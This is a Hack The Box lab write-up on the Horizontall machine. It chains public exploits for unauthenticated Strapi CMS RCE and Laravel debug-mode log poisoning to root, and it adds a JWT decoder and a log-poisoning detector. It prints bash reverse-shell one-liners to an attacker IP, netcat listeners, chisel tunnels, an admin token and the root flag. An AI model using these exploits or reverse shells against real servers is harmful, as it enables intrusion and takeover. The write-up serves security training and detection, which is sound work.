Saturday, 5 February 2022

HTB - HORIZONTALL

Introduction

IP: 10.10.11.105

S.O.: Ubuntu

Today I will show how to exploit the Strapi CMS through an RCE and then Laravel, also through an RCE.


Enumeration

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)

|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)

|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)

80/tcp open  http    nginx 1.14.0 (Ubuntu)

|_http-server-header: nginx/1.14.0 (Ubuntu)

|_http-title: Did not follow redirect to http://horizontall.htb

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


http://10.10.11.105 redirects to http://horizontall.htb, which means we need to add this host to /etc/hosts in order to resolve the hostname.


Then we access http://horizontall.htb. There is nothing interesting on the page itself, but if we look at the page source we see this message:

<noscript><strong>We're sorry but horizontall doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>

That gives us a clue, so it is worth having a look at the JS used by the application.

We identify two JS scripts:

/js/chunk-vendors.0e02b89e.js

/js/app.c68eb462.js


I usually look in these files for subdomains, IP addresses, API keys and passwords.

We find this subdomain in app.c68eb462.js:

r.a.get("http://api-prod.horizontall.htb/reviews")

We run wfuzz against http://api-prod.horizontall.htb:

wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 http://api-prod.horizontall.htb/FUZZ


000000259:   200        16 L     101 W      854 Ch      "admin"
000000202:   403        0 L      1 W        60 Ch       "users"
000000137:   200        0 L      21 W       507 Ch      "reviews"

We load the following URL in the browser:

http://api-prod.horizontall.htb/admin/auth/login

and we see the site is running the Strapi CMS.

If we look for known vulnerabilities, we find this one:

https://www.exploit-db.com/exploits/50239


Foothold


It is an unauthenticated RCE:

kali# python3 50239.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwOTYyMTU5LCJleHAiOjE2MzM1NTQxNTl9.N9hRodaT44QcUlcDzgqV7_70x_WjLZoX9EjbgDW9Osc


$> whoami
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

We cannot see the output as it is a blind RCE, so we start a netcat listener and launch a reverse shell:
$> /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/443 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output


$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.105] 32972
bash: cannot set terminal process group (1890): Inappropriate ioctl for device
bash: no job control in this shell
strapi@horizontall:~/myapi$ whoami
whoami
strapi
strapi@horizontall:~/myapi$ 
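A closer look at the token the exploit printed, added here as an example (it is not part of the original post or of the exploit script): decoding the claims shows the token is an admin token with a 30-day validity, so resetting the admin password alone does not revoke it; the server's JWT secret must be rotated as well.

```python
import base64
import json
from datetime import datetime, timezone

# The JWT exactly as returned by the exploit output above
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwOTYyMTU5LCJleHAiOjE2MzM1NTQxNTl9."
         "N9hRodaT44QcUlcDzgqV7_70x_WjLZoX9EjbgDW9Osc")


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore the '=' padding first
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def inspect_jwt(token: str) -> dict:
    """Decode header and claims WITHOUT verifying the signature (we do not hold
    the server's HS256 secret). Returns the facts an incident responder needs:
    who the token is for, whether it is privileged, and how long it stays valid."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    lifetime_seconds = claims["exp"] - claims["iat"]
    return {
        "alg": header["alg"],
        "user_id": claims["id"],
        "is_admin": claims["isAdmin"],
        "issued": datetime.fromtimestamp(claims["iat"], timezone.utc).isoformat(),
        "expires": datetime.fromtimestamp(claims["exp"], timezone.utc).isoformat(),
        "lifetime_days": lifetime_seconds / 86400,
    }


if __name__ == "__main__":
    for key, value in inspect_jwt(TOKEN).items():
        print(f"{key}: {value}")
```

Because the token is signed with a shared HS256 secret, any token issued before the compromise stays valid until `exp` unless that secret changes.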



Privilege Escalation


There are a couple of services running on localhost, on ports 1137 and 8000.

Let's use port forwarding to make those ports reachable from my local machine:


root@kali# ./chisel64 server --reverse
2021/09/09 21:49:54 server: Reverse tunnelling enabled
2021/09/09 21:49:54 server: Fingerprint Pv3bbM6067kXgJPlO3Br9eGph1ANPH3DmGEIq/W6i58=
2021/09/09 21:49:54 server: Listening on http://0.0.0.0:8080
2021/09/09 21:49:57 server: session#1: tun: proxy#R:1137=>1137: Listening
2021/09/09 21:50:12 server: session#2: tun: proxy#R:8000=>8000: Listening


strapi@horizontall:/dev/shm$ ./chisel64 client 10.10.14.13:8080 R:8000:127.0.0.1:8000
2021/09/09 19:56:01 client: Connecting to ws://10.10.14.13:8080
2021/09/09 19:56:02 client: Connected (Latency 121.791548ms)

If we now connect from my Kali box to http://127.0.0.1:8000, I can see a Laravel application running on that port.


The version is v8.

We find this RCE exploit for v8:

https://www.exploit-db.com/exploits/49424


Let's try it:

python 49424.py http://127.0.0.1:8000 /var/www/html/laravel/storage/logs/laravel.log 'id'

Phpggc not found!
Run command: git clone https://github.com/ambionics/phpggc.git
Clonando en 'phpggc'...
remote: Enumerating objects: 2587, done.
remote: Counting objects: 100% (929/929), done.
remote: Compressing objects: 100% (522/522), done.
remote: Total 2587 (delta 374), reused 812 (delta 283), pack-reused 1658
Recibiendo objetos: 100% (2587/2587), 388.83 KiB | 1.06 MiB/s, listo.
Resolviendo deltas: 100% (1016/1016), listo.

Exploit...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 699, in urlopen
    httplib_response = self._make_request(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 445, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 440, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.9/http/client.py", line 1347, in getresponse
    response.begin()
  File "/usr/lib/python3.9/http/client.py", line 307, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.9/http/client.py", line 276, in _read_status
    raise RemoteDisconnected("Remote end closed connection without"
http.client.RemoteDisconnected: Remote end closed connection without response

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/requests/adapters.py", line 439, in send
    resp = conn.urlopen(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 755, in urlopen
    retries = retries.increment(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/util/retry.py", line 532, in increment
    raise six.reraise(type(error), error, _stacktrace)
  File "/usr/local/lib/python3.9/dist-packages/urllib3/packages/six.py", line 734, in reraise
    raise value.with_traceback(tb)
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 699, in urlopen
    httplib_response = self._make_request(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 445, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 440, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python3.9/http/client.py", line 1347, in getresponse
    response.begin()
  File "/usr/lib/python3.9/http/client.py", line 307, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python3.9/http/client.py", line 276, in _read_status
    raise RemoteDisconnected("Remote end closed connection without"
urllib3.exceptions.ProtocolError: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/alter/htb-vip/horizontall/49424.py", line 125, in <module>
    main()
  File "/home/alter/htb-vip/horizontall/49424.py", line 112, in main
    clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
  File "/home/alter/htb-vip/horizontall/49424.py", line 34, in clear_log
    while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass
  File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 119, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 542, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 655, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/adapters.py", line 498, in send
    raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))
root@kali:/home/alter/htb-vip/horizontall# 



We find this page:

https://book.hacktricks.xyz/pentesting/pentesting-web/laravel


Visiting http://127.0.0.1:8000/profiles makes the application throw an exception:


ErrorException     Undefined variable: informat (View: /home/developer/myproject/resources/views/profile/index.blade.php)


So debug mode is enabled, and the error message leaks the application path (the earlier attempt used a guessed path under /var/www/html/laravel). From it we get the real Laravel log path, storage/logs/laravel.log under that directory, so with this information we can try the exploit again:


/home/developer/myproject/resources/views/profile/index.blade.php


kali:$ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'id'

Exploit...

uid=0(root) gid=0(root) groups=0(root)



kali$ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.13/80 0>&1"'


root@kali:/home/alter# nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.105] 53166
bash: cannot set terminal process group (62649): Inappropriate ioctl for device
bash: no job control in this shell
root@horizontall:/home/developer/myproject/public# cat /root/root.txt
cat /root/root.txt
9408100a11868ee3fede5e56421ef930
root@horizontall:/home/developer/myproject/public# 
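From the defender's side, the exploit leaves a trace: each attempt makes Laravel log a failed file_get_contents() on a php://filter/write=... wrapper whose resource is the log file itself (the chain is visible in the traceback above). The following detector is an added example, not code from the post or the exploit; the log lines it scans are constructed to mimic that trace and the entry format is assumed to be the standard "[timestamp] env.LEVEL: message" Laravel layout.

```python
import re
from dataclasses import dataclass

# Constructed sample of storage/logs/laravel.log: one harmless debug-mode
# error, two poisoning attempts that point the filter wrapper at the log itself,
# and one unrelated entry.
SAMPLE_LOG = """\
[2021-09-09 19:55:40] local.ERROR: Undefined variable: informat (View: /home/developer/myproject/resources/views/profile/index.blade.php)
[2021-09-09 19:56:01] local.ERROR: file_get_contents(php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/home/developer/myproject/storage/logs/laravel.log): failed to open stream: operation failed
[2021-09-09 19:56:02] local.ERROR: file_get_contents(php://filter/write=convert.base64-decode/resource=/home/developer/myproject/storage/logs/laravel.log): failed to open stream: operation failed
[2021-09-09 19:57:10] local.INFO: User logged in {"id":4}
"""

# "[YYYY-mm-dd HH:MM:SS] env.LEVEL: message"
ENTRY_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] (?P<env>\w+)\.(?P<level>\w+): (?P<msg>.*)$")
# php://filter wrapper with a read= or write= conversion chain and a target resource
FILTER_RE = re.compile(
    r"php://filter/(?P<mode>read|write)=(?P<chain>[^/]+)/resource=(?P<resource>[^)\s]+)"
)


@dataclass
class Finding:
    ts: str
    mode: str
    chain: list          # individual conversion filters, in order
    resource: str
    self_targeting: bool  # wrapper rewrites the log it is recorded in


def scan_laravel_log(text: str) -> list:
    """Return one Finding per php://filter wrapper seen in the log messages."""
    findings = []
    for line in text.splitlines():
        entry = ENTRY_RE.match(line)
        if not entry:
            continue
        for hit in FILTER_RE.finditer(entry.group("msg")):
            resource = hit.group("resource")
            findings.append(Finding(
                ts=entry.group("ts"),
                mode=hit.group("mode"),
                chain=hit.group("chain").split("|"),
                resource=resource,
                self_targeting=resource.endswith("/storage/logs/laravel.log"),
            ))
    return findings


def poisoning_attempts(text: str) -> list:
    """Only the write-mode wrappers aimed back at the log: the log-poisoning signature."""
    return [f for f in scan_laravel_log(text) if f.mode == "write" and f.self_targeting]
```

Any self-targeting write finding should be treated as an exploitation attempt against debug mode, which is fixed by setting APP_DEBUG=false rather than by hiding the log.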
